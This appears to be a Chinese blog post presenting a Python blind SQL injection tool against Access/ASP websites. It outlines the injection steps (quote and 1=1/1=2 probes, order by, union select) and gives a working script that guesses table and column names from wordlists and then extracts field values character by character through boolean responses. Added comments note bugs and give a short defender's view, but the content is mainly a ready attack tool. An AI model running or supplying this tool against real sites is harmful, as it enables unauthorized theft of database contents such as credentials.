Access、Asp注入工具

0x00:前言

自动化注入工具不需要太复杂,但应能用最简单、最直接的方式获取数据库信息,并根据自定义构造的 payload 绕过防护,这样即可。

Access、Asp注入一般流程:

理论   https://www.cnblogs.com/liqik/p/12333378.html

(1)找到注入点

  '

  and 1=1

  and 1=2

(2)猜解关键段

order by

联合查询找出显示点,注意隐式显示查看源码

union select ,,,,,,

(3)猜解表名

(4)猜解列名

(5)猜解内容

0x01:SQL工具

# _*_  coding:utf-8 _*_
'''
该脚本主要针对Access、ASP注入
'''
import requests

def getable(url):  # enumerate table names
    """Print candidate table names that the boolean probe reports as present.

    Reads one candidate name per line from ``tables.txt`` (each ``line`` still
    carries its trailing newline, which is spliced into the request as-is) and
    concatenates ``and exists(select * from <name>)`` directly onto *url*.
    The body is decoded as gb2312 and a name is printed when the marker string
    ``"XYCMS"`` appears in it, i.e. when the page rendered normally.

    NOTE(review): the file handle returned by ``open`` is never closed.
    Defender's view: this produces a burst of GETs to one URL whose query
    differs only by an ``and exists(select * from …)`` suffix; parameterized
    queries remove the injection point, and the repeated marker-dependent
    true/false pattern is what a WAF or log review should key on.
    """
    for line in open('tables.txt','r'):
        target = url + "and exists(select * from " + line + ")"
        response = requests.get(target)
        response.encoding = 'gb2312'
        if "XYCMS" in response.text:  # marker present -> page rendered normally -> condition true
            print(line+" ")

def getcolumn(url): # enumerate column names of one table
    """Print candidate column names of an interactively chosen table.

    Prompts for the table name, then for every line of ``columns.txt`` (newline
    included, unstripped) sends *url* with ``and (select count(<col>) from
    <table>)>0`` appended. A gb2312-decoded body containing ``"XYCMS"`` is
    taken as "column exists" and the name is printed on the same output line.

    NOTE(review): the file handle is never closed, and the user-supplied
    ``tablename`` is inserted into the query string without any validation.
    """
    tablename = input("which table ? ")
    print("columns' name : ")
    for line in open('columns.txt','r'):
        target = url + "and (select count(" + line +") from "+ tablename +")>0"
        response = requests.get(target)
        response.encoding = 'gb2312'
        if "XYCMS" in response.text:
            print(line+" ",end='')  # end='' keeps all hits on one line

def getcolumnlen(url,tablename,columname):
    """Return the length of the first row's value in *columname*, or None.

    Tries lengths 1 through 29 in order, appending
    ``and (select top 1 len(<col>) from <table>) = <i>`` to *url*; the first
    *i* whose gb2312-decoded response contains ``"XYCMS"`` is printed and
    returned.

    Returns:
        The matched length as an int. If no length in 1..29 matches, the
        function falls off the end and returns None — the ``__main__``
        caller then passes that None straight into ``getmsg``.
    """
    for i in range(1,30):
        target = url + "and (select top 1 len("+columname+") from "+tablename+") = " + str(i)
        r = requests.get(target)
        r.encoding = 'gb2312'
        if "XYCMS" in r.text:
            print("第一个字段长度:" + str(i))  # "length of the first field: <i>"
            return i

def getmsg(len,url,tablename,columname): # only recovers the first row
    """Recover the first row's value in *columname* one character at a time.

    For each position ``i`` in 1..*len* and each printable code ``j`` in
    48..126, appends ``and (select top 1 asc(mid(<col>,<i>,1)) from <table>)=
    <j>`` to *url*. Whenever the gb2312-decoded body contains ``"XYCMS"`` the
    character ``chr(j)`` is appended to ``result`` and the accumulated string
    is printed. Nothing is returned; the output is the printed progress only.

    NOTE(review): the parameter name ``len`` shadows the builtin for the whole
    body. The inner loop does not stop after a match, and a position that
    matches no code in 48..126 contributes no character, so the printed
    string can be shorter or longer than *len*.
    """
    result = ""
    for i in range(1,len+1):
        for j in range(48,127):
            target = url + "and (select top 1 asc(mid("+columname+","+str(i)+",1)) from "+ tablename +")= "+str(j)
            # template: and (select top 1 asc(mid(<column>,{0},1)) from <table>)= {1}
            r2 = requests.get(target)
            r2.encoding = 'gb2312'
            if "XYCMS" in r2.text:
                result += chr(j)
                print(result)  # prints the cumulative result after every hit

if __name__ == '__main__':
    # Placeholder URL; the query string must already end with the parameter
    # the functions above concatenate their clauses onto.
    url = "http://xxxxxxxxxx?id=1"
    #getable(url)
    print("tables done.")
    #getcolumn(url)
    print("columns done")
    # Table/column names are taken interactively; they are not validated.
    tablename = input("which table ?")
    columname = input("which column ?")
    # getcolumnlen returns None when no length in 1..29 matches; getmsg then
    # fails on ``len+1``.
    length = getcolumnlen(url,tablename,columname)
    getmsg(length,url,tablename,columname)
    print("done!")
原文地址:https://www.cnblogs.com/liqik/p/12353964.html